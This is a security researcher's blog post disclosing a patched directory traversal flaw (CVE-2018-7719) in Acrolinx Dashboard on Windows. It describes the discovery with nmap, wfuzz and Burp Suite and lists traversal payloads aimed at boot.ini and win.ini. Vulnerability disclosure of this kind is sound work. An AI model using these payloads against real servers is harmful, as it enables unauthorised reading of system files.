TR-EN | Acrolinx Dashboard Directory Traversal (CVE 2018-7719)
Hello everyone :)
In this article I will publish the vulnerability I found on acrolinx dashboard.
What Is Acrolinx
Acrolinx is a server-client system developed to support quality assurance during the creation of expertise texts.
This support includes the application and supervision of the writing and style rules and has the component of terminology management and terminology extraction through the Acrolinx Terminology module.
This module integrates with the quality assurance system for the extraction, management and use of erminology.
In addition, term candidates can be suggested and terms can be searched. Acrolinx supports transport formats such as OLIF, XML, MTF, TBX and CSV.
What is a Directory Traversal Attack?
Properly controlling access to web content is crucial for running a secure web server.Directory traversal or Path Traversal is an HTTP attack which allows attackers to access restricted directories and execute commands outside of the web server’s root directory.
Web servers provide two main levels of security mechanisms Access Control Lists (ACLs) Root directory An Access Control List is used in the authorization process.
It is a list which the web server’s administrator uses to indicate which users or groups are able to access, modify or execute particular files on the server, as well as other access rights.
Proof of Concept
The acrolinx dashboard running on Windows servers is affected by directory traversal. This vulnerability applies to all versions.I know I was running this dashboard in windows server because I did a scan with nmap in the beginning.
Firstly I did various tests with wfuzz to an input value I caught. I did not get any results. I created a wordlist for Windows servers
Link for wfuzz usage: http://www.berkdusunur.net/2017/11/web-application-penetration-testing.html
Wordlist
a short section
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini request 200 made with
I am with zehra when the http request is 200 :)
I obtained a directory traversal which is accomplished when I repeat this request using the burp suite
Then report process lived...
The company has released updates for all versions.
Twitter @berkdusunur
Telegram @berkdusunur
eng;
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7719
https://support.acrolinx.com/hc/en-us/articles/115005757125-Acrolinx-Server-Version-5-3-including-subsequent-service-releases-
https://hackertor.com/2018/03/25/na-cve-2018-7719-acrolinx-server-before-5-2-5-on-windows-allows/
https://www.security-database.com/detail.php?alert=CVE-2018-7719
https://infosec.cert-pa.it/cve-2018-7719.html
https://nvd.nist.gov/vuln/detail/CVE-2018-7719
SAFE DAYS :)
:)
0 yorum :
Yorum Gönder